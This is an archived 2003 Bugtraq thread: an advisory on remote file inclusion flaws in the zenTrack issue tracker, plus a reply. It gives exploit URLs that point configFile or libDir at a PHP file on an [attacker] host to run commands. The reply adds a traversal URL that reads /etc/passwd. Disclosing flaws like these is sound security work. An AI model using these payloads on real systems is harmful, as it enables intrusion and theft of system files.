linux, säkerhet

103848 2003-06-07  00:00  /63 rader/  <farking@i-ownur.info>
Importerad: 2003-06-07  00:00  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <5164>
Ärende: zenTrack Remote Command Execution Vulnerabilities
------------------------------------------------------------


Subject: zenTrack Remote Command Execution Vulnerabilities
Author: farking (farking@i-ownur.info)
Product: zenTrack 2.4.1 (latest) and below
Vendor: http://zendocs.phpzen.net/zentrack / 
http://sourceforge.net/projects/zentrack/
Status:  Vendor contacted (27/05/2003)
Location: http://farking.daemon.sh/advisories/zentrack-062003.txt
Greet to: corpsie & EvoIVGSR

Description
-----------

zenTrack is a flexible system for tracking work, requests,
information,  and customer care.  The goal of the project is to
provide a method for organizing, managing,  and archiving requests,
work, and information  in a structured and reliable method.

Details
-------

zenTrack vulnerability exist in header.php that hold zenTrack 
configuration settings. Some code

<?
:
  $libDir = "/web/zentrack/includes";
  $rootUrl = "http://www.yourhost.com/zentrack";
  $Debug_Mode = 0;
  $Demo_Mode = "off";
  $configFile = "$libDir/configVars.php";
:
?>


This allow anyone to take advantage of this vulnerability and run
remote  command as webserver privilege. For example:

http://[victim]/zentrack/index.php?configFile=http://[attacker]/cmd.php?
cmd=pwd

or

Create translator.class anywhere in your website contain php code that 
allow you to run command. For this example I'll 
create translator.class in the test directory:

http://[victim]/zentrack/www/index.php?libDir=http://
[attacker]/test/&cmd=pwd

If you dont wan't to see any error just copy translator.class as 
zenTrack.class :)

Other vulnerability is attacker can turn zenTrack demo mode to on or
set  zenTrack debug mode that will show extra info.


------------------------------
farking (farking@i-ownur.info)
http://farking.daemon.sh
(103848) / <farking@i-ownur.info>/--------(Ombruten)
Kommentar i text 103896 av gr00vy <groovy2600@yahoo.com.ar>
103896 2003-06-07  21:28  /70 rader/ gr00vy <groovy2600@yahoo.com.ar>
Importerad: 2003-06-07  21:28  av Brevbäraren
Extern mottagare: BugTraq <bugtraq@securityfocus.com>
Mottagare: Bugtraq (import) <5175>
Kommentar till text 103848 av  <farking@i-ownur.info>
Ärende: Re: zenTrack Remote Command Execution Vulnerabilities
------------------------------------------------------------
Like an add to this advisory if you send this to teh host....

http://www.vulnerablehost.com.ar/zentrack/index.php?configFile=/../../../../../etc/passwd

You can recieve the file! :)

www.zencracking.com.ar gr00vy Argentina!
On Thu, 2003-06-05 at 22:00, farking@i-ownur.info wrote:
> Subject: zenTrack Remote Command Execution Vulnerabilities
> Author: farking (farking@i-ownur.info)
> Product: zenTrack 2.4.1 (latest) and below
> Vendor: http://zendocs.phpzen.net/zentrack / 
> http://sourceforge.net/projects/zentrack/
> Status:  Vendor contacted (27/05/2003)
> Location: http://farking.daemon.sh/advisories/zentrack-062003.txt
> Greet to: corpsie & EvoIVGSR
> 
> Description
> -----------
> 
> zenTrack is a flexible system for tracking work, requests, information, 
> and customer care. 
> The goal of the project is to provide a method for organizing, managing, 
> and archiving requests, work, and information 
> in a structured and reliable method. 
> 
> Details
> -------
> 
> zenTrack vulnerability exist in header.php that hold zenTrack 
> configuration settings. Some code
> 
> <?
> :
>   $libDir = "/web/zentrack/includes";
>   $rootUrl = "http://www.yourhost.com/zentrack";
>   $Debug_Mode = 0;
>   $Demo_Mode = "off";
>   $configFile = "$libDir/configVars.php";
> :
> ?>
> 
> 
> This allow anyone to take advantage of this vulnerability and run remote 
> command as webserver privilege. For example:
> 
> http://[victim]/zentrack/index.php?configFile=http://[attacker]/cmd.php?
> cmd=pwd
> 
> or
> 
> Create translator.class anywhere in your website contain php code that 
> allow you to run command. For this example I'll 
> create translator.class in the test directory:
> 
> http://[victim]/zentrack/www/index.php?libDir=http://
> [attacker]/test/&cmd=pwd
> 
> If you dont wan't to see any error just copy translator.class as 
> zenTrack.class :)
> 
> Other vulnerability is attacker can turn zenTrack demo mode to on or set 
> zenTrack debug mode that will show extra info. 
> 
> 
> ------------------------------
> farking (farking@i-ownur.info)
> http://farking.daemon.sh
(103896) /gr00vy <groovy2600@yahoo.com.ar>/---------